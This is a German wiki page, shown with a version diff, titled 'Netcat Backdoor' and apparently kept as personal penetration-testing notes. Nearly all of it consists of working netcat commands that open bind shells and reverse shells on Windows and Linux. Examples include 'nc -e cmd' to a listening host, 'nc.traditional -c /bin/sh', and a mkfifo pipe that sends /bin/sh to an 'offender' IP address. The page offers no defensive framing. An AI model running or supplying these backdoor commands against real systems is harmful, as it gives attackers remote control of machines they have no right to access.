Netcat Backdoor: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 34: | Zeile 34: | ||
OFFENDER=10.1.1.2 | OFFENDER=10.1.1.2 | ||
*root@offender:~# nc -nvlp 8668 | *root@offender:~# nc -nvlp 8668 | ||
| − | *root@victim:~# | + | *root@victim:~# mkfifo /tmp/backpipe |
*root@victim:~# /bin/sh 0</tmp/backpipe | nc $OFFENDER 8668 1>/tmp/backpipe | *root@victim:~# /bin/sh 0</tmp/backpipe | nc $OFFENDER 8668 1>/tmp/backpipe | ||
*root@offender:~# nc -nvlp 8668 | *root@offender:~# nc -nvlp 8668 | ||
listening on [any] 8668 ... | listening on [any] 8668 ... | ||
connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154 | connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154 | ||
| + | |||
=Links= | =Links= | ||
*https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem | *https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem | ||
Version vom 17. Januar 2018, 10:13 Uhr
Windows
Download
Open Port
Victim
- C:\Users\admin\Downloads>nc -L -p 10011 -d -e cmd
Offender
MSVICTIM=10.1.1.4
- oesx:~ thomas$ nc $MSVICTIM 10011
Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. Alle Rechte vorbehalten. C:\Users\admin\Downloads>
Classic Backdoor
Offender
- root@offender:~# netcat -l -p 9999
Victim
- C:\Users\admin\Downloads>nc -e cmd 10.82.10.20 9999
Linux
with netcat-traditional
- root@victim:~# apt-get install netcat-traditional
- root@victim:~# nc.traditional -l -p 10001 -e /bin/bash
- root@offender:~# netcat 10.1.1.1 10001
with netcat-traditional
- root@offender:~# netcat -l -p 10002
- root@victim:~# apt-get install netcat-traditional
- root@victim:~# nc.traditional -c /bin/sh 10.1.1.2 10002
with netcat-openbsd
VICTIM=10.1.1.1 OFFENDER=10.1.1.2
- root@offender:~# nc -nvlp 8668
- root@victim:~# mkfifo /tmp/backpipe
- root@victim:~# /bin/sh 0</tmp/backpipe | nc $OFFENDER 8668 1>/tmp/backpipe
- root@offender:~# nc -nvlp 8668
listening on [any] 8668 ... connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154